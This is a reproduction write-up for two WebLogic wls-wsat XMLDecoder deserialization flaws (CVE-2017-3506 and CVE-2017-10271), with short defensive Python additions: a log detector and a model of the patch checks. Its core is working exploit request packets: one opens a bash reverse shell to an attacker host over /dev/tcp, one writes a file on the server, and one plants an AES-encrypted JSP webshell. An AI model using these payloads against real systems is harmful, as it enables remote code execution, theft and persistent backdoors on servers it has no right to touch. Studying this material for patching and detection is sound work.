WebLogic Vulnerability Reproduction
WebLogic XMLDecoder deserialization vulnerability (CVE-2017-3506)
Principle
Public disclosure showed that the WLS component of WebLogic (the wls-wsat web service) hands the SOAP WorkContext header to java.beans.XMLDecoder, which instantiates whatever classes the XML names, so a crafted XML document POSTed straight to the endpoint gives remote code execution.
Affected versions
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0.
Reproduction
The vulnerable endpoint may be any of the following paths:
- /wls-wsat/CoordinatorPortType
- /wls-wsat/RegistrationPortTypeRPC
- /wls-wsat/ParticipantPortType
- /wls-wsat/RegistrationRequesterPortType
- /wls-wsat/CoordinatorPortType11
- /wls-wsat/RegistrationPortTypeRPC11
- /wls-wsat/ParticipantPortType11
- /wls-wsat/RegistrationRequesterPortType11
Visit http://192.168.190.136:7001/wls-wsat/RegistrationRequesterPortType; a response showing the "Web Services" page means the wls-wsat component is deployed and the endpoint is reachable, which indicates the vulnerability is present.
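As an added example (not part of the original write-up), a small Python detector that runs over WebLogic access-log lines and reports POST requests to the eight wls-wsat endpoints listed above. It assumes the default common-log format of access.log, and the log lines embedded in it are constructed.

```python
import re

# The wls-wsat endpoints named in the write-up; all reach the same WorkContext
# handling code, so a POST to any of them deserves a look.
WLS_WSAT_ENDPOINTS = {
    "/wls-wsat/CoordinatorPortType",
    "/wls-wsat/RegistrationPortTypeRPC",
    "/wls-wsat/ParticipantPortType",
    "/wls-wsat/RegistrationRequesterPortType",
    "/wls-wsat/CoordinatorPortType11",
    "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/ParticipantPortType11",
    "/wls-wsat/RegistrationRequesterPortType11",
}

# Assumes WebLogic's default access.log format (NCSA common):
# host - user [timestamp] "METHOD /path HTTP/x.y" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def scan_access_log(lines):
    """Yield (src, timestamp, path, status) for POSTs to a wls-wsat endpoint.

    GETs are ignored: viewing the "Web Services" page is benign, while the
    XMLDecoder sink is reached only through a POSTed SOAP body. The status
    is reported because a successful payload usually answers with HTTP 500.
    """
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        path = m.group("path").split("?", 1)[0].rstrip("/")
        if path in WLS_WSAT_ENDPOINTS:
            yield (m.group("src"), m.group("ts"), path, int(m.group("status")))

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = """\
192.168.190.1 - - [01/Jan/2018:10:00:01 +0800] "GET /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 200 1153
192.168.190.1 - - [01/Jan/2018:10:00:09 +0800] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 500 1234
10.0.0.5 - - [01/Jan/2018:10:01:00 +0800] "POST /console/j_security_check HTTP/1.1" 302 0
192.168.190.1 - - [01/Jan/2018:10:02:30 +0800] "POST /wls-wsat/CoordinatorPortType?x=1 HTTP/1.1" 500 1234
""".splitlines()

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```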
Execute a reverse shell command (request packet)
```http
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: 192.168.190.136:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 841

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i >& /dev/tcp/192.168.190.1/4444 0>&1</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```
A netcat listener on port 4444 of the attacker host (192.168.190.1) receives the bash shell.
WebLogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability (CVE-2017-10271)
Principle
CVE-2017-10271 is a bypass of the patch for CVE-2017-3506: that patch blocked the `<object>` element in the WorkContext XML, and the bypass obtains the same class instantiation by replacing `<object>` with `<void class="...">`.
Affected versions
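Added example (not Oracle's code and not the write-up's): a Python model of the two server-side checks on the WorkContext header, covering both the XMLDecoder mechanism described in the Principle sections and the patch bypass just stated. It shows why the CVE-2017-3506 patch, which rejected only the `<object>` element, let the `<void class=...>` form of CVE-2017-10271 through, and what the later element-level check rejects. The check functions are simplified models of the element-name rules of the two patches, and the envelopes are constructed with harmless class names, since only the element shape matters.

```python
import xml.etree.ElementTree as ET

WORKCONTEXT_NS = "http://bea.com/2004/06/soap/workarea/"

def java_from_workcontext(envelope: str):
    """Return the <java> element carried in the WorkContext SOAP header (None if absent)."""
    root = ET.fromstring(envelope)
    return root.find(".//{%s}WorkContext/java" % WORKCONTEXT_NS)

def accepted_by_3506_patch(envelope: str) -> bool:
    """Model of the first patch (CVE-2017-3506): only the <object> element is rejected."""
    java = java_from_workcontext(envelope)
    return java is None or all(el.tag.lower() != "object" for el in java.iter())

def accepted_by_10271_patch(envelope: str) -> bool:
    """Model of the later patch (CVE-2017-10271): every XMLDecoder element that can
    name a class or invoke a method is rejected, so <void class=...> no longer passes."""
    java = java_from_workcontext(envelope)
    if java is None:
        return True
    for el in java.iter():
        tag = el.tag.lower()
        if tag in ("object", "new", "method"):
            return False
        if tag == "void" and any(a.lower() != "index" for a in el.attrib):
            return False  # <void class=...> or <void method=...>
        if tag == "array" and el.get("class") not in (None, "byte"):
            return False  # typed arrays other than byte[]
    return True

def soap_with_java(java_xml: str) -> str:
    """Constructed envelope in the same shape as the write-up's requests."""
    return ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soapenv:Header><work:WorkContext xmlns:work="%s">%s</work:WorkContext>'
            '</soapenv:Header><soapenv:Body/></soapenv:Envelope>' % (WORKCONTEXT_NS, java_xml))

# Harmless class names stand in for the real payloads; only the element shape matters.
BENIGN = soap_with_java('<java><string>ctx</string></java>')
OBJECT_FORM = soap_with_java(  # CVE-2017-3506 shape
    '<java><object class="java.lang.StringBuilder"><void method="append">'
    '<string>x</string></void></object></java>')
VOID_FORM = soap_with_java(    # CVE-2017-10271 shape: <object> replaced by <void class=...>
    '<java><void class="java.lang.StringBuilder"><void method="append">'
    '<string>x</string></void></void></java>')

if __name__ == "__main__":
    for name, env in (("benign", BENIGN), ("object", OBJECT_FORM), ("void", VOID_FORM)):
        print(name, accepted_by_3506_patch(env), accepted_by_10271_patch(env))
```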
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0.
Reproduction
Visit http://192.168.0.131:7001/wls-wsat/CoordinatorPortType; a response showing the "Web Services" page indicates the vulnerability is present.
Sending crafted XML to the endpoint with the POST method gives arbitrary command execution.
Try writing a file first.
Request Packet
```http
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.0.131:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 705

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.6.0" class="java.beans.XMLDecoder">
        <void class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string>
          <void method="println">
            <string>xmldecoder_vul_test11</string>
          </void>
          <void method="close"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```
The server returns 500, but the write has succeeded: XMLDecoder evaluates the payload (and its side effects) before the request fails, so a 500 here is the expected outcome rather than a failure.
Write a webshell (an AES-encrypted JSP shell)
```http
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.190.131:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 1154

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/zy.jsp</string>
          <void method="println"><string>
<![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c); }public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="b8a7336f1f7528e1";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(), "AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())) ).newInstance().equals(pageContext);}%>
]]>
          </string></void>
          <void method="close"/>
        </void>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
```